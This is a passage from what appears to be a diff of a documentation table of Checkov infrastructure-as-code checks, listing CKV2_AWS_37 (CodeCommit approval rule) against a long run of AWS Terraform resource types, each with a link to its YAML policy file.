[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 906 | CKV2_AWS_37 | resource | aws_api_gateway_account | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 907 | CKV2_AWS_37 | resource | aws_api_gateway_api_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 908 | CKV2_AWS_37 | resource | aws_api_gateway_authorizer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 909 | CKV2_AWS_37 | resource | 
aws_api_gateway_base_path_mapping | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 910 | CKV2_AWS_37 | resource | aws_api_gateway_client_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 911 | CKV2_AWS_37 | resource | aws_api_gateway_deployment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 912 | CKV2_AWS_37 | resource | aws_api_gateway_documentation_part | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 913 | CKV2_AWS_37 | resource | aws_api_gateway_documentation_version | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 914 | CKV2_AWS_37 | resource | aws_api_gateway_domain_name | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 915 | CKV2_AWS_37 | resource | aws_api_gateway_gateway_response | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 916 | CKV2_AWS_37 | resource | aws_api_gateway_integration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 917 | CKV2_AWS_37 | resource | aws_api_gateway_integration_response | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 918 | CKV2_AWS_37 | resource | aws_api_gateway_method | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 919 | CKV2_AWS_37 | resource | aws_api_gateway_method_response | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 920 | CKV2_AWS_37 | resource | aws_api_gateway_method_settings | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 921 | CKV2_AWS_37 | resource | aws_api_gateway_model | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 922 | CKV2_AWS_37 | resource | 
aws_api_gateway_request_validator | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 923 | CKV2_AWS_37 | resource | aws_api_gateway_resource | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 924 | CKV2_AWS_37 | resource | aws_api_gateway_rest_api | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 925 | CKV2_AWS_37 | resource | aws_api_gateway_stage | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 926 | CKV2_AWS_37 | resource | aws_api_gateway_usage_plan | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 927 | CKV2_AWS_37 | resource | aws_api_gateway_usage_plan_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 928 | CKV2_AWS_37 | resource | aws_api_gateway_vpc_link | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 929 | CKV2_AWS_37 | resource | aws_apigatewayv2_api | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 930 | CKV2_AWS_37 | resource | aws_apigatewayv2_api_mapping | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 931 | CKV2_AWS_37 | resource | aws_apigatewayv2_authorizer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 932 | CKV2_AWS_37 | resource | aws_apigatewayv2_deployment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 933 | CKV2_AWS_37 | resource | aws_apigatewayv2_domain_name | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 934 | CKV2_AWS_37 | resource | aws_apigatewayv2_integration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 935 | CKV2_AWS_37 | resource | 
aws_apigatewayv2_integration_response | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 936 | CKV2_AWS_37 | resource | aws_apigatewayv2_model | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 937 | CKV2_AWS_37 | resource | aws_apigatewayv2_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 938 | CKV2_AWS_37 | resource | aws_apigatewayv2_route_response | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 939 | CKV2_AWS_37 | resource | aws_apigatewayv2_stage | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 940 | CKV2_AWS_37 | resource | aws_apigatewayv2_vpc_link | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 941 | CKV2_AWS_37 | resource | aws_app_cookie_stickiness_policy | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 942 | CKV2_AWS_37 | resource | aws_appautoscaling_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 943 | CKV2_AWS_37 | resource | aws_appautoscaling_scheduled_action | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 944 | CKV2_AWS_37 | resource | aws_appautoscaling_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 945 | CKV2_AWS_37 | resource | aws_appmesh_mesh | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 946 | CKV2_AWS_37 | resource | aws_appmesh_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 947 | CKV2_AWS_37 | resource | aws_appmesh_virtual_node | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 948 | CKV2_AWS_37 | resource | aws_appmesh_virtual_router | Ensure 
CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 949 | CKV2_AWS_37 | resource | aws_appmesh_virtual_service | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 950 | CKV2_AWS_37 | resource | aws_appsync_api_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 951 | CKV2_AWS_37 | resource | aws_appsync_datasource | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 952 | CKV2_AWS_37 | resource | aws_appsync_function | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 953 | CKV2_AWS_37 | resource | aws_appsync_graphql_api | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 954 | CKV2_AWS_37 | resource | aws_appsync_resolver | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 955 | CKV2_AWS_37 | resource | 
aws_athena_database | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 956 | CKV2_AWS_37 | resource | aws_athena_named_query | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 957 | CKV2_AWS_37 | resource | aws_athena_workgroup | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 958 | CKV2_AWS_37 | resource | aws_autoscaling_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 959 | CKV2_AWS_37 | resource | aws_autoscaling_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 960 | CKV2_AWS_37 | resource | aws_autoscaling_lifecycle_hook | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 961 | CKV2_AWS_37 | resource | aws_autoscaling_notification | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 962 | CKV2_AWS_37 | resource | aws_autoscaling_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 963 | CKV2_AWS_37 | resource | aws_autoscaling_schedule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 964 | CKV2_AWS_37 | resource | aws_backup_plan | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 965 | CKV2_AWS_37 | resource | aws_backup_selection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 966 | CKV2_AWS_37 | resource | aws_backup_vault | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 967 | CKV2_AWS_37 | resource | aws_batch_compute_environment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 968 | CKV2_AWS_37 | resource | aws_batch_job_definition | Ensure CodeCommit associates an 
approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 969 | CKV2_AWS_37 | resource | aws_batch_job_queue | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 970 | CKV2_AWS_37 | resource | aws_budgets_budget | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 971 | CKV2_AWS_37 | resource | aws_cloud9_environment_ec2 | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 972 | CKV2_AWS_37 | resource | aws_cloudformation_stack | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 973 | CKV2_AWS_37 | resource | aws_cloudformation_stack_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 974 | CKV2_AWS_37 | resource | aws_cloudformation_stack_set_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 975 | CKV2_AWS_37 | resource | 
aws_cloudfront_distribution | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 976 | CKV2_AWS_37 | resource | aws_cloudfront_origin_access_identity | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 977 | CKV2_AWS_37 | resource | aws_cloudfront_public_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 978 | CKV2_AWS_37 | resource | aws_cloudhsm_v2_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 979 | CKV2_AWS_37 | resource | aws_cloudhsm_v2_hsm | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 980 | CKV2_AWS_37 | resource | aws_cloudtrail | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 981 | CKV2_AWS_37 | resource | aws_cloudwatch_dashboard | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 982 | CKV2_AWS_37 | resource | aws_cloudwatch_event_permission | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 983 | CKV2_AWS_37 | resource | aws_cloudwatch_event_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 984 | CKV2_AWS_37 | resource | aws_cloudwatch_event_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 985 | CKV2_AWS_37 | resource | aws_cloudwatch_log_destination | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 986 | CKV2_AWS_37 | resource | aws_cloudwatch_log_destination_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 987 | CKV2_AWS_37 | resource | aws_cloudwatch_log_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 988 | CKV2_AWS_37 | resource | 
aws_cloudwatch_log_metric_filter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 989 | CKV2_AWS_37 | resource | aws_cloudwatch_log_resource_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 990 | CKV2_AWS_37 | resource | aws_cloudwatch_log_stream | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 991 | CKV2_AWS_37 | resource | aws_cloudwatch_log_subscription_filter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 992 | CKV2_AWS_37 | resource | aws_cloudwatch_metric_alarm | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 993 | CKV2_AWS_37 | resource | aws_codebuild_project | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 994 | CKV2_AWS_37 | resource | aws_codebuild_source_credential | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 995 | CKV2_AWS_37 | resource | aws_codebuild_webhook | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 996 | CKV2_AWS_37 | resource | aws_codecommit_repository | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 997 | CKV2_AWS_37 | resource | aws_codecommit_trigger | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 998 | CKV2_AWS_37 | resource | aws_codedeploy_app | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 999 | CKV2_AWS_37 | resource | aws_codedeploy_deployment_config | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1000 | CKV2_AWS_37 | resource | aws_codedeploy_deployment_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1001 | CKV2_AWS_37 | resource | aws_codepipeline | Ensure 
CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1002 | CKV2_AWS_37 | resource | aws_codepipeline_webhook | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1003 | CKV2_AWS_37 | resource | aws_codestarnotifications_notification_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1004 | CKV2_AWS_37 | resource | aws_cognito_identity_pool | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1005 | CKV2_AWS_37 | resource | aws_cognito_identity_pool_roles_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1006 | CKV2_AWS_37 | resource | aws_cognito_identity_provider | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1007 | CKV2_AWS_37 | resource | aws_cognito_resource_server | Ensure CodeCommit associates an approval rule | Terraform | 
